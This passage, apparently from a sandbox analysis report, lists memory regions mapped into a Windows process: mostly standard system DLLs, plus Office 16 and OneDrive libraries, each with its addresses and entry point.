(normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 756 start_va = 0x7fef7ac0000 end_va = 0x7fef7b3ffff monitored = 0 entry_point = 0x7fef7ac4a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 757 start_va = 0x7fef7b40000 end_va = 0x7fef7b4bfff monitored = 0 entry_point = 0x7fef7b41070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 758 start_va = 0x7fef7b50000 end_va = 0x7fef7bcdfff monitored = 0 entry_point = 0x7fef7b51304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 759 start_va = 0x7fef7bd0000 end_va = 0x7fef7c04fff monitored = 0 entry_point = 0x7fef7bdc59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 760 start_va = 0x7fef7c10000 end_va = 0x7fef848dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll") Region: id = 761 start_va = 0x7fef8490000 end_va = 0x7fef8648fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 762 start_va = 0x7fef8650000 end_va = 0x7fef8965fff monitored = 0 entry_point = 0x7fef8653e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 763 start_va = 0x7fef8970000 end_va = 0x7fef8972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 764 start_va = 0x7fef8980000 end_va = 0x7fef8984fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 765 start_va = 0x7fef8990000 end_va = 0x7fef8992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 766 start_va = 0x7fef89a0000 end_va = 0x7fef89a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 767 start_va = 0x7fef89b0000 end_va = 0x7fef89b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 768 start_va = 0x7fef89c0000 end_va = 0x7fef89c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 769 start_va = 0x7fef89d0000 end_va = 0x7fef89dbfff monitored = 0 entry_point = 0x7fef89d4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 770 start_va = 0x7fef89e0000 end_va = 0x7fef8a70fff monitored = 0 entry_point = 0x7fef8a32430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 771 start_va = 0x7fef8a80000 end_va = 0x7fef8a83fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 772 start_va = 0x7fef8a90000 end_va = 0x7fef8a93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 773 start_va = 0x7fef8aa0000 end_va = 0x7fef8aa3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 774 start_va = 0x7fef8ab0000 end_va = 0x7fef8ab2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 775 start_va = 0x7fef8ac0000 end_va = 0x7fef8ac2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 776 start_va = 0x7fef8ad0000 end_va = 0x7fef8ad2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 777 start_va = 0x7fef8ae0000 end_va = 0x7fef8ae2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 778 start_va = 0x7fef8af0000 end_va = 0x7fef8af2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 779 start_va = 0x7fef8b00000 end_va = 0x7fef8b02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 780 start_va = 0x7fef8b10000 end_va = 0x7fef8c01fff monitored = 0 entry_point = 0x7fef8b19060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 781 start_va = 0x7fef8c10000 end_va = 0x7fef8c13fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 782 start_va = 0x7fef8c20000 end_va = 0x7fef8c38fff monitored = 0 entry_point = 0x7fef8c2ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 783 start_va = 0x7fef8c40000 end_va = 0x7fef8e53fff monitored = 0 entry_point = 0x7fef8c41000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll") Region: id = 784 start_va = 0x7fef8e60000 end_va = 0x7fef8f2dfff monitored = 0 entry_point = 0x7fef8e830fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 785 start_va = 0x7fef8f30000 end_va = 0x7fef8fd6fff monitored = 0 entry_point = 0x7fef8f7b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 786 start_va = 0x7fef8fe0000 end_va = 0x7fef9035fff monitored = 0 entry_point = 0x7fef8fe86e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 787 start_va = 0x7fef9040000 end_va = 0x7fef9209fff monitored = 0 entry_point = 0x7fef9047a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 788 start_va = 0x7fef9260000 end_va = 0x7fef9262fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 789 start_va = 0x7fef9280000 end_va = 0x7fef92bafff monitored = 0 entry_point = 0x7fef92822f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 790 start_va = 0x7fef9330000 end_va = 0x7fef93ecfff monitored = 0 entry_point = 0x7fef9331ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 791 start_va = 0x7fef93f0000 end_va = 0x7fef946bfff monitored = 0 entry_point = 0x7fef93f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 792 start_va = 0x7fef9580000 end_va = 0x7fef958bfff monitored = 0 entry_point = 0x7fef958602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 793 start_va = 0x7fef9590000 end_va = 0x7fef9603fff monitored = 0 entry_point = 0x7fef95966f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 794 start_va = 0x7fefa140000 end_va = 0x7fefa196fff monitored = 0 entry_point = 0x7fefa141118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 795 start_va = 0x7fefac50000 end_va = 0x7fefac67fff monitored = 0 entry_point = 0x7fefac51bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 796 start_va = 0x7fefac70000 end_va = 0x7fefac80fff monitored = 0 entry_point = 0x7fefac716ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 797 start_va = 0x7fefb130000 end_va = 0x7fefb13efff monitored = 0 entry_point = 0x7fefb131040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 798 start_va = 0x7fefb140000 end_va = 0x7fefb149fff monitored = 0 entry_point = 0x7fefb144938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 799 start_va = 0x7fefb150000 end_va = 0x7fefb16bfff monitored = 0 entry_point = 0x7fefb151198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 800 start_va = 0x7fefb170000 end_va = 0x7fefb191fff monitored = 0 entry_point = 0x7fefb171198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 801 start_va = 0x7fefb1a0000 end_va = 0x7fefb1a9fff monitored = 0 entry_point = 0x7fefb1a1198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 802 start_va = 0x7fefb1b0000 end_va = 0x7fefb1c7fff monitored = 0 entry_point = 0x7fefb1b1010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 803 start_va = 0x7fefb1d0000 end_va = 0x7fefb1d9fff monitored = 0 entry_point = 0x7fefb1d49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 804 start_va = 0x7fefb1e0000 end_va = 0x7fefb22efff monitored = 0 entry_point = 0x7fefb1e2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 805 start_va = 0x7fefb230000 end_va = 0x7fefb26afff monitored = 0 entry_point = 0x7fefb257600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 806 start_va = 0x7fefb2b0000 end_va = 0x7fefb2bafff monitored = 0 entry_point = 0x7fefb2b1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 807 start_va = 0x7fefb2c0000 end_va = 0x7fefb2e6fff monitored = 0 entry_point = 0x7fefb2c98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 808 start_va = 0x7fefb2f0000 end_va = 0x7fefb356fff monitored = 0 entry_point = 0x7fefb306060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 809 start_va = 0x7fefb370000 end_va = 0x7fefb37afff monitored = 0 entry_point = 0x7fefb374f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 810 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b8fff monitored = 0 entry_point = 0x7fefb3a11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 811 start_va = 0x7fefb440000 end_va = 0x7fefb454fff monitored = 0 entry_point = 0x7fefb4460d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 812 start_va = 0x7fefb530000 end_va = 0x7fefb656fff monitored = 0 entry_point = 0x7fefb5310ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 813 start_va = 0x7fefb760000 end_va = 0x7fefb768fff monitored = 0 entry_point = 0x7fefb761010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 814 start_va = 0x7fefb770000 end_va = 0x7fefb79bfff monitored = 0 entry_point = 0x7fefb7715c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 815 start_va = 0x7fefb850000 end_va = 0x7fefb87cfff monitored = 0 entry_point = 0x7fefb851010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 816 start_va = 0x7fefb8a0000 end_va = 0x7fefb8affff monitored = 0 entry_point = 0x7fefb8a95dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 817 start_va = 0x7fefb8b0000 end_va = 0x7fefb8b7fff monitored = 0 entry_point = 0x7fefb8b11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 818 start_va = 0x7fefb8c0000 end_va = 0x7fefb8d5fff monitored = 0 entry_point = 0x7fefb8c1050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 819 start_va = 0x7fefb8e0000 end_va = 0x7fefb950fff monitored = 0 entry_point = 0x7fefb91ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 820 start_va = 0x7fefb960000 end_va = 0x7fefb9c8fff monitored = 0 entry_point = 0x7fefb961198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 821 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e3fff monitored = 0 entry_point = 0x7fefb9d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 822 start_va = 0x7fefb9f0000 end_va = 0x7fefba04fff monitored = 0 entry_point = 0x7fefb9f1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 823 start_va = 0x7fefba10000 end_va = 0x7fefba1bfff monitored = 0 entry_point = 0x7fefba118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 824 start_va = 0x7fefba40000 end_va = 0x7fefbaf9fff monitored = 0 entry_point = 0x7fefba4115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 825 start_va = 0x7fefbb00000 end_va = 0x7fefbb42fff monitored = 0 entry_point = 0x7fefbb030d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 826 start_va = 0x7fefbb50000 end_va = 0x7fefbb60fff monitored = 0 entry_point = 0x7fefbb51070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 827 start_va = 0x7fefbb70000 end_va = 0x7fefbb7afff monitored = 0 entry_point = 0x7fefbb71030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 828 start_va = 0x7fefbb80000 end_va = 0x7fefbca9fff monitored = 0 entry_point = 0x7fefbb83810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 829 start_va = 0x7fefbcb0000 end_va = 0x7fefbce4fff monitored = 0 entry_point = 0x7fefbcb1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 830 start_va = 0x7fefbcf0000 end_va = 0x7fefbd07fff monitored = 0 entry_point = 0x7fefbcf1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 831 start_va = 0x7fefbd10000 end_va = 0x7fefbd5afff monitored = 0 entry_point = 0x7fefbd1efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 832 start_va = 0x7fefbd60000 end_va = 0x7fefbd6afff monitored = 0 entry_point = 0x7fefbd61020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 833 start_va = 0x7fefbd70000 end_va = 0x7fefbdaafff monitored = 0 entry_point = 0x7fefbd7f410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 834 start_va = 0x7fefbdb0000 end_va = 0x7fefbdf2fff monitored = 0 entry_point = 0x7fefbdbc168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 835 start_va = 0x7fefbe00000 end_va = 0x7fefbef1fff monitored = 0 entry_point = 0x7fefbe2ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 836 start_va = 0x7fefbf00000 end_va = 0x7fefc114fff monitored = 0 entry_point = 0x7fefc0d64b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 837 start_va = 0x7fefc120000 end_va = 0x7fefc175fff monitored = 0 entry_point = 0x7fefc12bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 838 start_va = 0x7fefc180000 end_va = 0x7fefc2abfff monitored = 0 entry_point = 0x7fefc1894bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 839 start_va = 0x7fefc2b0000 end_va = 0x7fefc2ccfff monitored = 0 entry_point = 0x7fefc2b1ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 840 start_va = 0x7fefc2d0000 end_va = 0x7fefc2f3fff monitored = 0 entry_point = 0x7fefc2d1024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 841 start_va = 0x7fefc300000 end_va = 0x7fefc4f3fff monitored = 0 entry_point = 0x7fefc48c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 842 start_va = 0x7fefc500000 end_va = 0x7fefc609fff monitored = 0 entry_point = 0x7fefc501010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 843 start_va = 0x7fefc610000 end_va = 0x7fefc7e9fff monitored = 0 entry_point = 0x7fefc613130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 844 start_va = 0x7fefc990000 end_va = 0x7fefc99bfff monitored = 0 entry_point = 0x7fefc991064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 845 start_va = 0x7fefcb70000 end_va = 0x7fefcb8dfff monitored = 0 entry_point = 0x7fefcb713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 846 start_va = 0x7fefcdc0000 end_va = 0x7fefce06fff monitored = 0 entry_point = 0x7fefcdc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 847 start_va = 0x7fefd0c0000 end_va = 0x7fefd0d7fff monitored = 0 entry_point = 0x7fefd0c3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 848 start_va = 0x7fefd2f0000 end_va = 0x7fefd35cfff monitored = 0 entry_point = 0x7fefd2f1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 849 start_va = 0x7fefd5c0000 end_va = 0x7fefd5e2fff monitored = 0 entry_point = 0x7fefd5c1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 850 start_va = 0x7fefd660000 end_va = 0x7fefd66afff monitored = 0 entry_point = 0x7fefd661030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 851 start_va = 0x7fefd690000 end_va = 0x7fefd6b4fff monitored = 0 entry_point = 0x7fefd699658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 852 start_va = 0x7fefd6c0000 end_va = 0x7fefd6cefff monitored = 0 entry_point = 0x7fefd6c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 853 start_va = 0x7fefd6d0000 end_va = 0x7fefd760fff monitored = 0 entry_point = 0x7fefd6d1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 854 start_va = 0x7fefd770000 end_va = 0x7fefd7acfff monitored = 0 entry_point = 0x7fefd7718f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 855 start_va = 0x7fefd7b0000 end_va = 0x7fefd7c3fff monitored = 0 entry_point = 0x7fefd7b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 856 start_va = 0x7fefd7d0000 end_va = 0x7fefd7defff monitored = 0 entry_point = 0x7fefd7d19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 857 start_va = 0x7fefd870000 end_va = 0x7fefd87efff monitored = 0 entry_point = 0x7fefd871020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 858 start_va = 0x7fefd920000 end_va = 0x7fefd98bfff monitored = 0 entry_point = 0x7fefd922780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 859 start_va = 0x7fefd990000 end_va = 0x7fefd9a9fff monitored = 0 entry_point = 0x7fefd991558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 860 start_va = 0x7fefd9b0000 end_va = 0x7fefd9e5fff monitored = 0 entry_point = 0x7fefd9b1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: 